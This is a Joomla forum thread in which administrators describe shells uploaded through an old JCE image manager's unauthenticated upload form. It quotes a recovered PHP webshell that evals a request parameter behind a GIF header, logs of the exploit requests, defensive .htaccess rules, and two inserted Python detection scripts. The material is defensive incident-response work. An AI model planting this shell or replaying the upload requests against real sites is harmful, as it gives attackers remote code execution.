Story about JCE and hack attempt

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

ahmad
Joomla! Guru
Posts: 902
Joined: Fri Apr 07, 2006 4:02 pm
Location: Egypt
Contact:

Story about JCE and hack attempt

Post by ahmad » Mon Aug 27, 2012 10:16 am

Greetings,

I am sharing what I've experienced today and the way I was thinking and analyzing so excuse me if it's a long post ...

I am on a dedicated machine protected by a firewall, proxy and a powerful enterprise anti-virus software. There's no access to the administration and no way for a user to login except through a VPN.

Today the anti-virus detected a 'php_rc57shell' malware. Quick research shown that this is another shell script being used to take control over the files/db ... etc. I checked the access logs and found a POST request matching the time when the anti-virus stopped the file:

Code:

POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 10 "-" "BOT/0.1 (BOT for JCE)"
As shown, it's calling com_jce and the imgmanager plugin. So, maybe a user tried to upload some malicious file? Is it a hacking attempt? This is a pretty normal request, present in the everyday log, but:
1. It wasn't in the regular working hours our users used to work.
2. This was the first time this IP address visited the site!
I opened the browser and tried to access this URL directly. I was not logged in, so I thought I would get an error or something. I was surprised because the page flashed for a second with the title saying 'Image Manager : 1.5.7.11', then it was redirected to the homepage! I viewed the source and found the image manager upload form waiting for an input.

Now it makes perfect sense. Someone is trying to upload a shell script with an image extension to pass the upload restriction, using the unprotected form. I tried to search whether that was reported before and found it. Someone even created a script where you post the URL of the website you want to attack and the file, to make it easy for script kiddies to do it:


I am using an old version of JCE. We were planning to upgrade but we have a lot of user groups and many modifications were done so the schedule didn't fit for an upgrade and test yet.

I am using:
JCE version: 1.5.7.11
Image Manager version: 1.5.7.11

Edit: The new versions of JCE redirect directly to the homepage and show an error: You're not authorized to view this resource.

Regards

mandville
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Mon Aug 27, 2012 3:48 pm

there have been an awful lot of upgrades between 1.5.7.11 and now, you must have been very busy doing other things.
i suggest you follow checklist 7, safe route to recovery, and contact the developer to sort out your "You're not authorized to view this resource." error
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

ahmad
Joomla! Guru
Posts: 902
Joined: Fri Apr 07, 2006 4:02 pm
Location: Egypt
Contact:

Re: Story about JCE and hack attempt

Post by ahmad » Tue Aug 28, 2012 6:49 am

Thankfully, nothing bad happened as the anti-virus stopped the malicious file. Logs show that the user tried to access the file but got a 404. He thought it was uploaded successfully while it wasn't.

The "You're not authorized" message shows up when I try to access the plugin without logging in. So this is a normal behavior not an error :) I was reporting that this was fixed in the newer versions of JCE.

gfisch
Joomla! Apprentice
Posts: 16
Joined: Tue Jan 19, 2010 6:11 pm
Location: Montreal, Canada
Contact:

Re: Story about JCE and hack attempt

Post by gfisch » Wed Aug 29, 2012 1:51 pm

Same thing for me!

I was getting rogue redirects added to .htaccess files and written to every directory.
After some digging for suspicious files I found a couple. One example:

Code:

(0)# more ./images/stories/story.php
GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>
Checking apache logs I saw the JCE image manager call three weeks ago:

Code:

91.202.244.73 - - [04/Aug/2012:14:36:25 -0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1 " 200 70 "-" "BOT/0.1 (BOT for JCE)"
91.202.244.73 - - [04/Aug/2012:14:36:26 -0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
91.202.244.73 - - [04/Aug/2012:14:36:32 -0400] "GET //images/stories/story.php HTTP/1.1" 200 15 "-" "BOT/0.1 (BOT for JCE)"
Finally updated JCE. Easy to forget about third party software...
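The three log lines above (and the single line in the opening post) show the whole sequence: an image-manager call from the JCE upload tool, then a fetch of a .php file from /images/. As an added example, not code from the thread or from JCE, here is a small Python scanner that flags that pattern in an Apache combined log. The sample lines are constructed, modelled on gfisch's, with the source address replaced by a documentation IP and one benign visitor added for contrast.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Constructed sample, modelled on the Apache lines posted above; the source
# address is replaced by a documentation IP and one benign visitor is added.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Aug/2012:14:36:25 -0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 70 "-" "BOT/0.1 (BOT for JCE)"
203.0.113.7 - - [04/Aug/2012:14:36:26 -0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
203.0.113.7 - - [04/Aug/2012:14:36:32 -0400] "GET //images/stories/story.php HTTP/1.1" 200 15 "-" "BOT/0.1 (BOT for JCE)"
198.51.100.9 - - [04/Aug/2012:15:01:10 -0400] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Aug/2012:15:01:11 -0400] "GET /images/stories/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phps)$', re.I)
UA_REASON = 'user agent of the JCE upload tool'

def parse_line(line):
    """Split one access-log line into fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    # Split path and query by hand: urlparse() would read the "//images/..."
    # form seen in these logs as a host name rather than a path.
    path, _, query = rec['target'].partition('?')
    rec['path'] = re.sub(r'/+', '/', path)
    rec['query'] = {k: v[0] for k, v in parse_qs(query).items()}
    return rec

def is_imgmanager_call(rec):
    q = rec['query']
    return q.get('option') == 'com_jce' and q.get('plugin') == 'imgmanager'

def find_jce_upload_chains(log_text, window=timedelta(minutes=10)):
    """Return {ip: [reasons]} for clients whose traffic matches the upload pattern."""
    findings = {}
    last_call = {}  # ip -> time of its most recent image-manager call
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec['ip']
        reasons = findings.setdefault(ip, [])
        if 'BOT for JCE' in rec['ua'] and UA_REASON not in reasons:
            reasons.append(UA_REASON)
        if is_imgmanager_call(rec):
            last_call[ip] = rec['ts']
        elif (rec['path'].startswith('/images/') and SCRIPT_EXT.search(rec['path'])
              and ip in last_call and rec['ts'] - last_call[ip] <= window):
            # A script fetched from the upload tree right after an image-manager
            # call is the tell-tale of a successful (or attempted) shell upload;
            # the status is kept because a 404 here still means an attempt.
            reasons.append('script requested from upload dir after image-manager call: '
                           f"{rec['path']} (status {rec['status']})")
    return {ip: r for ip, r in findings.items() if r}
```

Feed it a real access log with `find_jce_upload_chains(open('access.log').read())`; legitimate editors also call the image manager, so it is the user agent and the follow-up script fetch, not the call itself, that should raise an alert.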

ahmad
Joomla! Guru
Posts: 902
Joined: Fri Apr 07, 2006 4:02 pm
Location: Egypt
Contact:

Re: Story about JCE and hack attempt

Post by ahmad » Thu Aug 30, 2012 11:59 pm

Yes we learn the lessons the hard way!

mandville, did you get my message? Sorry, but it's still in my outbox; I am sure I sent it.

mandville
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Fri Aug 31, 2012 3:30 am

the link you provided showed a version
# Vulnerable Version: 2.0.10 (Image Manager 1.5.7.13, Media Manager
1.5.6.3, Template Manager 1.5.5, File Manager 1.5.4.1 & prior versions
also may be affected)
Posted *2011-08-23*

Please check the latest versions with the developer
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

BoardBoss
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 11:41 am

@ahmad Can you publicly or privately share with me the software that stopped this exploit? I got hit with this hack on a server with multiple Joomla accounts, and it changed every username on every account to "sec-w.com", and the passwords were the same for everybody, too. Since the exploit also scanned the server and gave them access to all account names, etc., they would have super user access to every affected Joomla account.

The only accounts spared from this exploit were those suspended for one reason or another, and one that was intentionally broken for testing purposes. Because the exploit couldn't post into these accounts, they were not affected.

There were two Joomla security scripts in place being evaluated on several accounts, although the account that was exploited did not have one. I am not naming them because of that, and the fact that a shell script that modifies the DB would not (IMHO) be detected by them as that is not really their focus. I could be (and probably am :) ) wrong on this, although since neither of the solutions being tested were installed on the exploited account, I am going to ask in the support forums for both.

Cheers!

ahmad
Joomla! Guru
Posts: 902
Joined: Fri Apr 07, 2006 4:02 pm
Location: Egypt
Contact:

Re: Story about JCE and hack attempt

Post by ahmad » Sun Dec 30, 2012 12:46 pm

@BoardBoss you have my sympathy ...

Right now I do not know what it is. Probably this week I will be back with an answer!

BoardBoss
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 12:54 pm

@ahmad Thank you very much in advance for any input you can offer.

Slackervaara
Joomla! Ace
Posts: 1047
Joined: Sat Aug 13, 2011 6:27 am

Re: Story about JCE and hack attempt

Post by Slackervaara » Sun Dec 30, 2012 2:29 pm

Changing the username and password in a table can be done with phpMyAdmin, or by running a certain query. Maybe such a query could be run through a script or through SQL injection. If it is injection, you could search your access logs for sec-w.com to see if you detect the hack. If it is in a script on your site, and you have a copy of your site on your PC, you could use grep to try to find the file containing sec-w.com.

BoardBoss
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 2:36 pm

Slackervaara wrote:
Changing the username and password in a table can be done with phpMyAdmin, or by running a certain query. Maybe such a query could be run through a script or through SQL injection. If it is injection, you could search your access logs for sec-w.com to see if you detect the hack. If it is in a script on your site, and you have a copy of your site on your PC, you could use grep to try to find the file containing sec-w.com.
Hi - Thank you for the reply; however, I know that. :)

Think about a Joomla site with 1,000 users. Would you really want to go through and have to manually change all usernames on that site? What if there were 100 such sites on the server? Obviously that would get old in a hurry.

Slackervaara
Joomla! Ace
Posts: 1047
Joined: Sat Aug 13, 2011 6:27 am

Re: Story about JCE and hack attempt

Post by Slackervaara » Sun Dec 30, 2012 2:51 pm

I did not suggest that you should change back usernames and passwords with phpMyAdmin; instead I was discussing how the hack was made, by pointing out that such changes can be made with phpMyAdmin. So the hacker could have had (1) access to your phpMyAdmin, (2) SQL injection, or (3) a script on your site. I guess you can track SQL injection via access logs and scripts via grep of your files, as I suggested, or using the JAMSS script.

BoardBoss
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 3:02 pm

Slackervaara wrote:
I did not suggest that you should change back usernames and passwords with phpMyAdmin; instead I was discussing how the hack was made, by pointing out that such changes can be made with phpMyAdmin. So the hacker could have had (1) access to your phpMyAdmin, (2) SQL injection, or (3) a script on your site. I guess you can track SQL injection via access logs and scripts via grep of your files, as I suggested, or using the JAMSS script.
Hi - No problem. We have already identified the source of the exploit. I do not want to identify it here for obvious reasons; however, it appears that it came through a Joomla 1.5.26 site running an older version of an editor extension. I have seen many exploits and hacks over the years and this one is by far potentially the worst. I will know for sure after it is all healed. :)

Slackervaara
Joomla! Ace
Posts: 1047
Joined: Sat Aug 13, 2011 6:27 am

Re: Story about JCE and hack attempt

Post by Slackervaara » Sun Dec 30, 2012 3:29 pm

I use MySQLDumper for backup and restore. MySQLDumper has the feature that one can restore individual tables, which is very good if the users table has been hacked and usernames substituted. I only need to restore that table from backup if I get hacked like you just have been.

BoardBoss
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 3:42 pm

Slackervaara wrote:
I use MySQLDumper for backup and restore. MySQLDumper has the feature that one can restore individual tables, which is very good if the users table has been hacked and usernames substituted. I only need to restore that table from backup if I get hacked like you just have been.
Hi again. The backup process we utilize allows specific tables to be restored as well. I am more interested in preventing future exploits like this as I have better things to do. I am starting by implementing my own termination of support for Joomla 1.5.x. :)

mandville
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Sun Dec 30, 2012 5:03 pm

moderator comment
please keep on topic and do not divert into the pros and cons of different methods of backup/restore beyond the fix to this issue.
Would posters please read the full topic and not just the last few posts, to prevent embarrassment and confusion
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

BoardBoss
Joomla! Ace
Posts: 1209
Joined: Sat Mar 18, 2006 10:41 am
Location: Borgarnes, Iceland

Re: Story about JCE and hack attempt

Post by BoardBoss » Sun Dec 30, 2012 5:18 pm

mandville wrote:
moderator comment
please keep on topic and do not divert into the pros and cons of different methods of backup/restore beyond the fix to this issue.
Would posters please read the full topic and not just the last few posts, to prevent embarrassment and confusion
Thank you, Mandville. Timely and right on target, as usual. :)

Codelizard
Joomla! Fledgling
Posts: 4
Joined: Wed Jan 02, 2013 1:05 am

Re: Story about JCE and hack attempt

Post by Codelizard » Wed Jan 02, 2013 5:50 am

ahmad wrote:
Today the anti-virus detected a 'php_rc57shell' malware.
I'd love to know what you are running that caught this. What anti-virus?

jbourque
Joomla! Apprentice
Posts: 9
Joined: Sun Aug 09, 2009 2:47 am
Location: Missouri
Contact:

Re: Story about JCE and hack attempt

Post by jbourque » Wed Jan 23, 2013 10:51 pm

I have installed Exploit Scanner from ConfigServer on one of my servers and it actively monitors files uploaded to my server. It runs ClamAV which, if a virus is found, will automatically quarantine the file (e.g. hide.php) and notify me that a virus was found. I have been running this for a couple of weeks and it works amazingly, so I just requested to have it installed on my other server.

I am running JCE 2.1.x on many of my sites and I have seen that there is still an issue with the image manager; I just posted on the JCE forum to try and find a resolution to this problem.

So if you are running Linux and ClamScan, it is WORTH the $50 to have Sara install Exploit Scanner on your server. For more info check out www.configserver.com

Best of luck
Joseph Bourque
Above Web Media
"Putting your business one click from your customers"
http://www.AboveWebMedia.com
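As an added illustration of the kind of content check an upload monitor like the one described above performs (this is not ConfigServer's or ClamAV's code), the Python snippet below walks an upload directory and flags the polyglot pattern gfisch posted earlier in the thread: a file that starts with image magic bytes but carries a PHP open tag and a request parameter fed straight into eval(). The fixture tree is constructed in a temporary directory; the story.php sample is modelled on the one from the thread.

```python
import os
import re
import tempfile

IMAGE_MAGIC = (b'GIF87a', b'GIF89a', b'\x89PNG\r\n\x1a\n', b'\xff\xd8\xff')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phps|phar)$', re.I)
PHP_TAG = re.compile(rb'<\?(php\b|=)', re.I)
# Request data handed straight to a code-execution sink, optionally via stripslashes()
EVAL_SINK = re.compile(
    rb'\b(eval|assert|system|passthru|shell_exec)\s*\(\s*(stripslashes\s*\(\s*)?'
    rb'\$_(REQUEST|POST|GET|COOKIE)\b', re.I)
POLYGLOT = 'image magic bytes followed by a PHP open tag (polyglot)'

def inspect_file(path):
    """Return the reasons a file looks like a planted script; an empty list means clean."""
    reasons = []
    with open(path, 'rb') as fh:
        head = fh.read(512 * 1024)  # the first 512 KiB is enough for these checks
    if SCRIPT_EXT.search(path):
        reasons.append('script extension inside an upload directory')
    if PHP_TAG.search(head):
        # A real image never contains "<?php"; a leading image header just means
        # the file was crafted to pass a magic-bytes or getimagesize() check.
        reasons.append(POLYGLOT if head.startswith(IMAGE_MAGIC) else 'PHP open tag')
    if EVAL_SINK.search(head):
        reasons.append('request parameter passed straight to a code-execution sink')
    return reasons

def scan_upload_dir(root):
    """Walk an upload tree (e.g. Joomla's images/) and map suspicious files to reasons."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = inspect_file(full)
            if reasons:
                hits[os.path.relpath(full, root).replace(os.sep, '/')] = reasons
    return hits

def build_sample_tree():
    """Constructed fixture: a small images/ tree with one polyglot shell, one benign
    GIF and one JPEG that merely hides a PHP tag after its header."""
    root = tempfile.mkdtemp(prefix='images-')
    os.makedirs(os.path.join(root, 'stories'))
    samples = {
        'stories/story.php': (b"GIF89a1\n<?php\nif (isset($_REQUEST['p1'])) {\n"
                              b"\teval(stripslashes($_REQUEST['p1']));\n}\n?>\n"),
        'stories/logo.gif': b'GIF89a' + bytes(64),
        'stories/photo.jpg': b'\xff\xd8\xff\xe0' + bytes(16) + b'<?php echo 1; ?>',
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), 'wb') as fh:
            fh.write(data)
    return root

if __name__ == '__main__':
    for rel, why in sorted(scan_upload_dir(build_sample_tree()).items()):
        print(rel, '->', '; '.join(why))
```

Run it against a site's real images/ directory with `scan_upload_dir('/path/to/joomla/images')`; a hit with the polyglot reason is exactly the kind of file an extension-only upload filter lets through.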

Codelizard
Joomla! Fledgling
Posts: 4
Joined: Wed Jan 02, 2013 1:05 am

Re: Story about JCE and hack attempt

Post by Codelizard » Thu Jan 24, 2013 7:58 am

Thanks so much.

one thing you should add, regardless, is an .htaccess file in your /images/ folder that disallows any scripts from being run. So, even if a php file DOES get uploaded, it cannot be executed...

KCA
Joomla! Apprentice
Posts: 42
Joined: Thu Feb 17, 2011 8:59 pm

Re: Story about JCE and hack attempt

Post by KCA » Sat Jan 26, 2013 10:28 pm

^^^^ Can you please give an example of what that .htaccess file would look like?
Thanks!

Codelizard
Joomla! Fledgling
Posts: 4
Joined: Wed Jan 02, 2013 1:05 am

Re: Story about JCE and hack attempt

Post by Codelizard » Sun Jan 27, 2013 12:05 am

Put this in your .htaccess file:

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .exe
Options -ExecCGI

that makes it so scripts of those extensions are not allowed to run, and will generate a FORBIDDEN error if tried.

Another thing to consider in the .htaccess, is something like this:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite.com/.*$ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]

The above will not allow anyone to view the images unless they are viewing them as content on "yourwebsite.com". This stops people from linking your images.

Find a good .htaccess tutorial on the web for more options. These are two I use for image folders.

gregzem
Joomla! Fledgling
Posts: 2
Joined: Mon Feb 04, 2013 7:49 pm

Re: Story about JCE and hack attempt

Post by gregzem » Tue Feb 05, 2013 9:16 am

1. add the following to ./images/.htaccess to prevent PHP shells from running

#####################
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
#####################

2. deny access to /tmp folder by adding ./tmp/.htaccess with the following content

#####################
deny from all
#####################

3. For Joomla 1.5.x I've created a patch which protects against [removed] so you may want to try it

http://revisium.com/download/jce_patch.zip (instruction enclosed with the .zip)

It works perfectly for my joomla websites so try it.
Last edited by mandville on Tue Feb 05, 2013 3:24 pm, edited 1 time in total.
Reason: removed link to exploit site with hacking method. Posting such is Against forum rules

mandville
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Tue Feb 05, 2013 3:29 pm

gregzem wrote: 3. For Joomla 1.5.x I've created a patch which protects against [removed] so you may want to try it

moderators comment: downloading and using patch files from unofficial sources (often pay-per-fix sites) may have unwanted consequences.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

gregzem
Joomla! Fledgling
Posts: 2
Joined: Mon Feb 04, 2013 7:49 pm

Re: Story about JCE and hack attempt

Post by gregzem » Tue Feb 05, 2013 4:32 pm

1. As far as I know, 1.5.26 is the latest version of Joomla, so no new version will be released and the JCE vulnerability will never be resolved. Do you think it is good to leave users without any solution?

2. The patch is 5 lines long, so you can easily download and check the source.

Codelizard
Joomla! Fledgling
Posts: 4
Joined: Wed Jan 02, 2013 1:05 am

Re: Story about JCE and hack attempt

Post by Codelizard » Tue Feb 05, 2013 6:00 pm

gregzem wrote:
1. As far as I know, 1.5.26 is the latest version of Joomla, so no new version will be released and the JCE vulnerability will never be resolved. Do you think it is good to leave users without any solution?

2. The patch is 5 lines long, so you can easily download and check the source.

While I agree with the moderator, the patch is indeed only 5 lines long. Basically, if com_jce is called, and the person is NOT a logged in admin or super admin, then they get permission denied. I'll be making this small change, myself.

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Story about JCE and hack attempt

Post by PhilD » Tue Feb 05, 2013 7:38 pm

There is a huge range of technical ability on the security forums, ranging from none to extensive. While most stuff posted is intended to help, there is a moral obligation for the moderators to warn everyone about the use of patches, scripts, etc. from non-official sites, and that the use of such may cause harm to a site or unintended issues with sites or extensions. Remember, not everyone can (or even wants to) read code and see what it does.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

mandville
Joomla! Master
Posts: 15076
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Story about JCE and hack attempt

Post by mandville » Tue Feb 05, 2013 8:20 pm

has the patch been offered to jce or would they just say upgrade to the latest version as that is safe??
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Rhand
Joomla! Enthusiast
Posts: 213
Joined: Sat Oct 01, 2005 3:09 pm
Location: World
Contact:

Re: Story about JCE and hack attempt

Post by Rhand » Thu Mar 07, 2013 3:29 am

mandville wrote:has the patch been offered to jce or would they just say upgrade to the latest version as that is safe??
This I would like to know as well. I need to either patch this plugin or use a .htaccess block. One site got hacked twice and probably twice using this vulnerability.
CEO Imagewize Ltd: webdesign | web development | branding
website: Imagewize.net

skuran
Joomla! Fledgling
Posts: 2
Joined: Fri Aug 31, 2012 12:49 pm

Re: Story about JCE and hack attempt

Post by skuran » Tue Mar 12, 2013 2:06 pm

I tested this patch and it's working. It is a simple workaround until all bloody Joomla 1.5 content is upgraded. Thanks.

